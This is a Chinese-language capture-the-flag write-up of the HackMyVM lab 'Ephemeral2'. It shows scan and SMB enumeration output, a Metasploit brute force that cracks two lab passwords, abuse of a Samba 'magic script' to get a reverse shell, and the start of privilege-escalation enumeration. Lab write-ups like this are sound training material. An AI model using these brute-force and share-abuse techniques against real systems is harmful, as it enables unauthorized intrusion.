{"id":669,"date":"2024-04-30T21:09:02","date_gmt":"2024-04-30T13:09:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=669"},"modified":"2024-04-30T21:09:02","modified_gmt":"2024-04-30T13:09:02","slug":"hmv-_-ephemeral2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/669\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Ephemeral2"},"content":{"rendered":"

Ephemeral2<\/h1>\n

\"image-20240430190439316\"<\/div>
\n
\"image-20240430191126501\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ rustscan -a 192.168.0.132 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.132:22\nOpen 192.168.0.132:80\nOpen 192.168.0.132:139\nOpen 192.168.0.132:445\n\nPORT    STATE SERVICE     REASON  VERSION\n22\/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 0a:cc:f1:53:7e:6b:31:2c:10:1e:6d:bc:01:b1:c3:a2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4EkKlQsLoJ+r82mQnd6FWkjL2Ry4tLVriMceGPvzHNFlbbkpa7kkAIf3TtOp7Tads45gLfrNVTC98MHegGZwvL3aIaFPp0LodGxJeQG2lgudoWY9M5sfLMd5oUpcykWXcZfpibQVVhQSpPg4tIpWRVrIKZrBo2CxV8XsRh5RevdNZzzJ6w3D8zuwaBkHD7KI+2eaiuAYrmEkbUVHLkstY\/nHclJwsDBMkx+u4gv7Rz3S37gmYhg8a74iZqqFpDF47AJ8fcC3k6pXQr3iArgpOU2Rc20THgwn8nRBit2CzO9C5DIf1KvoKIlNftYXK+Wnw2FmIGUmF7YxjC3ys1uXDahRjcW6EKZpRb2XKzPNtfoR+sdOPvLJkcXubn5\/HTuy5HKmfk7cByX6\/6KwYau11OxrM87YL+Fyl0VUobTKrC3570aaFamtWCd\/A7oB3xsxQ8pSr7l2Pjx+20BSGjvw7dkMG1Yecf\/79Db9f+DvxrLEIUOxRUWAGijr++Ar5s88=\n|   256 cd:19:04:a0:d1:8a:8b:3d:3e:17:ee:21:5d:cd:6e:49 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBlMZBD50d94mQuFM4n2frVjcsaG1yWdXgHdmKBMNddOg9M67uUbNp8jHiwF\/XQ36yiBGxPXWvvGoxI4oM97c3M=\n|   256 e5:6a:27:39:ed:a8:c9:03:46:f2:a5:8c:87:85:44:9e (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBwwUJchIYxvumcFeCwJ4yZnFQPfYLQj3dnAKrIU4j+1\n80\/tcp  open  http        syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_  Supported Methods: OPTIONS HEAD GET POST\n|_http-title: Apache2 Ubuntu Default Page: It works\n139\/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: 19m57s\n| nbstat: NetBIOS name: EPHEMERAL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\n| Names:\n|   EPHEMERAL<00>        Flags: <unique><active>\n|   EPHEMERAL<03>        Flags: <unique><active>\n|   EPHEMERAL<20>        Flags: <unique><active>\n|   WORKGROUP<00>        Flags: <group><active>\n|   WORKGROUP<1e>        Flags: <group><active>\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2024-04-30T11:12:03\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 19990\/tcp): CLEAN (Couldn't connect)\n|   Check 2 (port 18848\/tcp): CLEAN (Couldn't connect)\n|   Check 3 (port 42628\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 39156\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.132\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.132\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,bak,jpg,txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 10918]\n\/javascript           (Status: 301) [Size: 319] [--> http:\/\/192.168.0.132\/javascript\/]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\n\/foodservice          (Status: 301) [Size: 320] [--> http:\/\/192.168.0.132\/foodservice\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240430192445185\"<\/div><\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
http:\/\/192.168.0.132\/foodservice\/<\/code><\/pre>\n
\"image-20240430192751400\"<\/div><\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
SMB\u670d\u52a1\u63a2\u6d4b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ smbmap -H 192.168.0.132                       \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/"       )|"  \\    \/"  ||   _  "\\ |"  \\    \/"  |     \/""\\       |   __ "\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/' \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __'  \\    (|  \/\n   \/" \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.0.132:445       Name: ephemeral                 Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        SYSADMIN                                                NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (ephemeral server (Samba, Ubuntu))\n        Officejet_Pro_8600_CDECA1_                              NO ACCESS<\/code><\/pre>\n
\u6ca1\u6709\u8fdb\u5165\u6743\u9650\uff0c\u5f97\u627e\u5230\u522b\u7684\u65b9\u5411\uff0c\u518d\u63a2\u6d4b\u4e00\u4e0b\u201c<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ enum4linux 192.168.0.132\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Tue Apr 30 07:25:25 2024\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.0.132\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.0.132 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.0.132 )===============================\n\nLooking up status of 192.168.0.132\n        EPHEMERAL       <00> -         B <ACTIVE>  Workstation Service\n        EPHEMERAL       <03> -         B <ACTIVE>  Messenger Service\n        EPHEMERAL       <20> -         B <ACTIVE>  File Server Service\n        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain\/Workgroup Name\n        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections\n\n        MAC Address = 00-00-00-00-00-00\n\n ===================================( Session Check on 192.168.0.132 )===================================\n\n[+] Server 192.168.0.132 allows sessions using username '', password ''\n\n ================================( Getting domain SID for 192.168.0.132 )================================\n\nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n\n[+] Can't determine if host is part of domain or part of a workgroup\n\n ==================================( OS information on 192.168.0.132 )==================================\n\n[E] Can't get OS info with smbclient\n\n[+] Got OS info for 192.168.0.132 from srvinfo: \n        EPHEMERAL      Wk Sv PrQ Unx NT SNT ephemeral server (Samba, Ubuntu)\n        platform_id     :       500\n        os version      :       6.1\n        server type     :       0x809a03\n\n =======================================( Users on 192.168.0.132 )=======================================\n\nindex: 0x1 RID: 0x3e9 acb: 0x00000010 Account: randy    Name: randy     Desc: \n\nuser:[randy] rid:[0x3e9]\n\n =================================( Share Enumeration on 192.168.0.132 )=================================\n\nsmbXcli_negprot_smb1_done: No compatible protocol selected by server.\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        print$          Disk      Printer Drivers\n        SYSADMIN        Disk      \n        IPC$            IPC       IPC Service (ephemeral server (Samba, Ubuntu))\n        Officejet_Pro_8600_CDECA1_ Printer   \nReconnecting with SMB1 for workgroup listing.\nProtocol negotiation to server 192.168.0.132 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE\nUnable to connect with SMB1 -- no workgroup available\n\n[+] Attempting to map shares on 192.168.0.132\n\n\/\/192.168.0.132\/print$  Mapping: DENIED Listing: N\/A Writing: N\/A\n\/\/192.168.0.132\/SYSADMIN        Mapping: DENIED Listing: N\/A Writing: N\/A\n\n[E] Can't understand response:\n\nNT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*\n\/\/192.168.0.132\/IPC$    Mapping: N\/A Listing: N\/A Writing: N\/A\n\/\/192.168.0.132\/Officejet_Pro_8600_CDECA1_      Mapping: DENIED Listing: N\/A Writing: N\/A\n\n ===========================( Password Policy Information for 192.168.0.132 )===========================\n\n[+] Attaching to 192.168.0.132 using a NULL share\n\n[+] Trying protocol 139\/SMB...\n\n[+] Found domain(s):\n\n        [+] EPHEMERAL\n        [+] Builtin\n\n[+] Password Info for Domain: EPHEMERAL\n\n        [+] Minimum password length: 5\n        [+] Password history length: None\n        [+] Maximum password age: 37 days 6 hours 21 minutes \n        [+] Password Complexity Flags: 000000\n\n                [+] Domain Refuse Password Change: 0\n                [+] Domain Password Store Cleartext: 0\n                [+] Domain Password Lockout Admins: 0\n                [+] Domain Password No Clear Change: 0\n                [+] Domain Password No Anon Change: 0\n                [+] Domain Password Complex: 0\n\n        [+] Minimum password age: None\n        [+] Reset Account Lockout Counter: 30 minutes \n        [+] Locked Account Duration: 30 minutes \n        [+] Account Lockout Threshold: None\n        [+] Forced Log off Time: 37 days 6 hours 21 minutes \n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 5\n\n ==================( Users on 192.168.0.132 via RID cycling (RIDS: 500-550,1000-1050) )==================\n\n[I] Found new SID: \nS-1-22-1\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[+] Enumerating users using SID S-1-22-1 and logon username '', password ''\n\nS-1-22-1-1000 Unix User\\randy (Local User)\nS-1-22-1-1001 Unix User\\ralph (Local User)\n\n[+] Enumerating users using SID S-1-5-21-1796334311-1091253459-1090880117 and logon username '', password ''\n\nS-1-5-21-1796334311-1091253459-1090880117-501 EPHEMERAL\\nobody (Local User)\nS-1-5-21-1796334311-1091253459-1090880117-513 EPHEMERAL\\None (Domain Group)\nS-1-5-21-1796334311-1091253459-1090880117-1001 EPHEMERAL\\randy (Local User)\n\n[+] Enumerating users using SID S-1-5-32 and logon username '', password ''\n\nS-1-5-32-544 BUILTIN\\Administrators (Local Group)\nS-1-5-32-545 BUILTIN\\Users (Local Group)\nS-1-5-32-546 BUILTIN\\Guests (Local Group)\nS-1-5-32-547 BUILTIN\\Power Users (Local Group)\nS-1-5-32-548 BUILTIN\\Account Operators (Local Group)\nS-1-5-32-549 BUILTIN\\Server Operators (Local Group)\nS-1-5-32-550 BUILTIN\\Print Operators (Local Group)\n\n ===============================( Getting printer info for 192.168.0.132 )===============================\n\n        flags:[0x800000]\n        name:[\\\\192.168.0.132\\Officejet_Pro_8600_CDECA1_]\n        description:[\\\\192.168.0.132\\Officejet_Pro_8600_CDECA1_,,]\n        comment:[]\n\nenum4linux complete on Tue Apr 30 07:25:41 2024<\/code><\/pre>\n
SMB\u7206\u7834<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u4f46\u662f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ hydra -L user.txt -P \/usr\/share\/wordlists\/rockyou.txt smb:\/\/192.168.0.132 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-30 07:20:44\n[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)\n[DATA] max 1 task per 1 server, overall 1 task, 28688798 login tries (l:2\/p:14344399), ~28688798 tries per task\n[DATA] attacking smb:\/\/192.168.0.132:445\/\n[ERROR] target smb:\/\/192.168.0.132:445\/ does not support SMBv1<\/code><\/pre>\n
\u5c1d\u8bd5\u4f7f\u7528msf<\/code>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\n
https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/1-system-attack\/windows-attacks\/smb-psexec#smb-brute-force<\/a><\/p>\n
https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smb#enumerate-users-groups-and-logged-on-users<\/a><\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ msfconsole     \nMetasploit tip: Use the edit command to open the currently active module \nin your editor\n\n  Metasploit Park, System Security Interface\n  Version 4.0.5, Alpha E\n  Ready...\n  > access security\n  access: PERMISSION DENIED.\n  > access security grid\n  access: PERMISSION DENIED.\n  > access main security grid\n  access: PERMISSION DENIED....and...\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n  YOU DIDN'T SAY THE MAGIC WORD!\n\n       =[ metasploit v6.4.2-dev                           ]\n+ -- --=[ 2408 exploits - 1240 auxiliary - 422 post       ]\n+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 > search smb_login\n\nMatching Modules\n================\n\n   #  Name                             Disclosure Date  Rank    Check  Description\n   -  ----                             ---------------  ----    -----  -----------\n   0  auxiliary\/scanner\/smb\/smb_login  .                normal  No     SMB Login Check Scanner\n\nInteract with a module by name or index. For example info 0, use 0 or use auxiliary\/scanner\/smb\/smb_login\n\nmsf6 > use 0\n[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session\nmsf6 auxiliary(scanner\/smb\/smb_login) > show options\n\nModule options (auxiliary\/scanner\/smb\/smb_login):\n\n   Name               Current Setting  Required  Description\n   ----               ---------------  --------  -----------\n   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected\n   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password\n   BLANK_PASSWORDS    false            no        Try blank passwords for all users\n   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5\n   CreateSession      false            no        Create a new session for every successful login\n   DB_ALL_CREDS       false            no        Try each user\/password couple stored in the current database\n   DB_ALL_PASS        false            no        Add all passwords in the current database to the list\n   DB_ALL_USERS       false            no        Add all users in the current database to the list\n   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)\n   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication\n   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user\n   PASS_FILE                           no        File containing passwords, one per line\n   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.\n   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]\n   RECORD_GUEST       false            no        Record guest-privileged random logins to the database\n   RHOSTS                              yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.htm\n                                                 l\n   RPORT              445              yes       The SMB service port (TCP)\n   SMBDomain          .                no        The Windows domain to use for authentication\n   SMBPass                             no        The password for the specified username\n   SMBUser                             no        The username to authenticate as\n   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host\n   THREADS            1                yes       The number of concurrent threads (max one per host)\n   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line\n   USER_AS_PASS       false            no        Try the username as the password for all users\n   USER_FILE                           no        File containing usernames, one per line\n   VERBOSE            true             yes       Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_login) > set RHOSTS 192.168.0.132\nRHOSTS => 192.168.0.132\nmsf6 auxiliary(scanner\/smb\/smb_login) > set USER_FILE \/home\/kali\/temp\/Ephemeral2\/user.txt\nUSER_FILE => \/home\/kali\/temp\/Ephemeral2\/user.txt\nmsf6 auxiliary(scanner\/smb\/smb_login) > set PASS_FILE \/usr\/share\/metasploit-framework\/data\/wordlists\/unix_passwords.txt\nPASS_FILE => \/usr\/share\/metasploit-framework\/data\/wordlists\/unix_passwords.txt\nmsf6 auxiliary(scanner\/smb\/smb_login) > set VERBOSE false\nVERBOSE => false\nmsf6 auxiliary(scanner\/smb\/smb_login) > exploit\n\n[+] 192.168.0.132:445     - 192.168.0.132:445 - Success: '.\\randy:pogiako'\n[+] 192.168.0.132:445     - 192.168.0.132:445 - Success: '.\\ralph:admin'\n[*] 192.168.0.132:445     - Scanned 1 of 1 hosts (100% complete)\n[*] 192.168.0.132:445     - Bruteforce completed, 2 credentials were successful.\n[*] 192.168.0.132:445     - You can open an SMB session with these credentials and CreateSession set to true\n[*] Auxiliary module execution completed<\/code><\/pre>\n
randy   pogiako\nralph   admin<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ smbclient \/\/192.168.0.132\/SYSADMIN -U randy\nPassword for [WORKGROUP\\randy]:\nTry "help" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Sun Apr 10 21:13:45 2022\n  ..                                  D        0  Sun Apr 10 20:36:23 2022\n  reminder.txt                        N      193  Sun Apr 10 20:59:06 2022\n  smb.conf                            N     9097  Sat Apr  9 16:32:20 2022\n  help.txt                            N     4663  Sun Apr 10 20:59:43 2022\n\n                8704372 blocks of size 1024. 390320 blocks available\nsmb: \\> get reminder.txt\ngetting file \\reminder.txt of size 193 as reminder.txt (5.9 KiloBytes\/sec) (average 5.9 KiloBytes\/sec)\nsmb: \\> get smb.conf\ngetting file \\smb.conf of size 9097 as smb.conf (161.5 KiloBytes\/sec) (average 104.3 KiloBytes\/sec)\nsmb: \\> get help.txt \ngetting file \\help.txt of size 4663 as help.txt (2276.7 KiloBytes\/sec) (average 153.1 KiloBytes\/sec)\nsmb: \\> exit<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ cat reminder.txt \nHey randy! I just set up smb like you asked me too. I left a file for you if you ever need help accessing your smb share.\nFor now all your shares are going to be under [SYSADMIN]\n\nThank You.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ cat smb.conf\n................\n[SYSADMIN]\n\npath = \/home\/randy\/smbshare\nvalid users = randy\nbrowsable = yes\nwriteable = yes\nread only = no\nmagic script = smbscript.elf\nguest ok = no<\/code><\/pre>\n
\"image-20240430202834771\"<\/div><\/p>\n
\u6211\u4eec\u518d\u53bb\u67e5\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240430203125036\"<\/div><\/p>\n
\u6240\u4ee5\u8bf4\uff0c\u4ed6\u4f1a\u5728\u6211\u4eec\u767b\u5f55\u7684\u65f6\u5019\u8fdb\u884c\u6267\u884c\uff0c\u6211\u4eec\u4fee\u6539\u4e00\u4e2a\u53cd\u5f39shell\u5c06\u5176\u547d\u540d\u4e3asmbscript.elf<\/code>\u5c31\u53ef\u4ee5\u5f97\u5230\u6267\u884c\uff1a<\/p>\n
\"image-20240430203618545\"<\/div>
\n
\"image-20240430203629828\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) randy@ephemeral:\/home\/randy$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/snap\/snapd\/21465\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1405\/usr\/bin\/chfn\n\/snap\/core20\/1405\/usr\/bin\/chsh\n\/snap\/core20\/1405\/usr\/bin\/gpasswd\n\/snap\/core20\/1405\/usr\/bin\/mount\n\/snap\/core20\/1405\/usr\/bin\/newgrp\n\/snap\/core20\/1405\/usr\/bin\/passwd\n\/snap\/core20\/1405\/usr\/bin\/su\n\/snap\/core20\/1405\/usr\/bin\/sudo\n\/snap\/core20\/1405\/usr\/bin\/umount\n\/snap\/core20\/1405\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1405\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1328\/usr\/bin\/chfn\n\/snap\/core20\/1328\/usr\/bin\/chsh\n\/snap\/core20\/1328\/usr\/bin\/gpasswd\n\/snap\/core20\/1328\/usr\/bin\/mount\n\/snap\/core20\/1328\/usr\/bin\/newgrp\n\/snap\/core20\/1328\/usr\/bin\/passwd\n\/snap\/core20\/1328\/usr\/bin\/su\n\/snap\/core20\/1328\/usr\/bin\/sudo\n\/snap\/core20\/1328\/usr\/bin\/umount\n\/snap\/core20\/1328\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1328\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/passwd\n\/usr\/bin\/fusermount\n\/usr\/bin\/newgrp\n\/usr\/bin\/vmware-user-suid-wrapper\n\/usr\/bin\/chfn\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/sbin\/pppd\n(remote) randy@ephemeral:\/home\/randy$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/snap\/core20\/1405\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1328\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n(remote) randy@ephemeral:\/home\/randy$ ss -tulup\nNetid         State          Recv-Q         Send-Q                 Local Address:Port                         Peer Address:Port         Process         \nudp           UNCONN         0              0                            0.0.0.0:631                               0.0.0.0:*                            \nudp           UNCONN         0              0                      127.0.0.53%lo:domain                            0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.255:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.132:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.255:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.132:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:42181                             0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:mdns                              0.0.0.0:*                            \nudp           UNCONN         0              0                               [::]:48880                                [::]:*                            \nudp           UNCONN         0              0                               [::]:mdns                                 [::]:*                            \ntcp           LISTEN         0              4096                   127.0.0.53%lo:domain                            0.0.0.0:*                            \ntcp           LISTEN         0              128                          0.0.0.0:ssh                               0.0.0.0:*                            \ntcp           LISTEN         0              5                          127.0.0.1:ipp                               0.0.0.0:*                            \ntcp           LISTEN         0              50                           0.0.0.0:microsoft-ds                      0.0.0.0:*                            \ntcp           LISTEN         0              50                           0.0.0.0:netbios-ssn                       0.0.0.0:*                            \ntcp           LISTEN         0              511                                *:http                                    *:*                            \ntcp           LISTEN         0              128                             [::]:ssh                                  [::]:*                            \ntcp           LISTEN         0              5                              [::1]:ipp                                  [::]:*                            \ntcp           LISTEN         0              50                              [::]:microsoft-ds                         [::]:*                            \ntcp           LISTEN         0              50                              [::]:netbios-ssn                          [::]:*     <\/code><\/pre>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff0c\u672a\u679c\uff0c\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u4ee5\u53capspy64<\/code>\uff01<\/p>\n
\"image-20240430204932874\"<\/div><\/p>\n
\u5f88\u663e\u773c\uff0c\u6211\u786e\u4fe1\u8fd9\u662f\u7a81\u7834\u53e3\uff01\uff01\uff01\uff01<\/p>\n
\"image-20240430205002259\"<\/div><\/p>\n
\u67e5\u770b\u914d\u7f6e\u6587\u4ef6<\/h3>\n
(remote) randy@ephemeral:\/tmp$ cd  \/etc\/profile.d\n(remote) randy@ephemeral:\/etc\/profile.d$ ls -la\ntotal 48\ndrwxr-xr-x   2 randy root  4096 Apr  9  2022 .\ndrwxr-xr-x 132 root  root 12288 Apr 10  2022 ..\n-rw-r--r--   1 randy root    97 Apr  9  2022 01-locale-fix.sh\n-rw-r--r--   1 randy root   835 Feb 18  2022 apps-bin-path.sh\n-rw-r--r--   1 randy root   729 Feb  1  2020 bash_completion.sh\n-rw-r--r--   1 randy root  1003 Aug 13  2019 cedilla-portuguese.sh\n-rw-r--r--   1 randy root   349 Oct 28  2020 im-config_wayland.sh\n-rw-r--r--   1 randy root  1368 Apr  9  2022 vte-2.91.sh\n-rw-r--r--   1 randy root   967 Apr  9  2022 vte.csh\n-rw-r--r--   1 randy root   954 Mar 26  2020 xdg_dirs_desktop_session.sh\n(remote) randy@ephemeral:\/etc\/profile.d$ head 01-locale-fix.sh \n# Make sure the locale variables are set to valid values.\neval $(\/usr\/bin\/locale-check C.UTF-8)<\/code><\/pre>\n
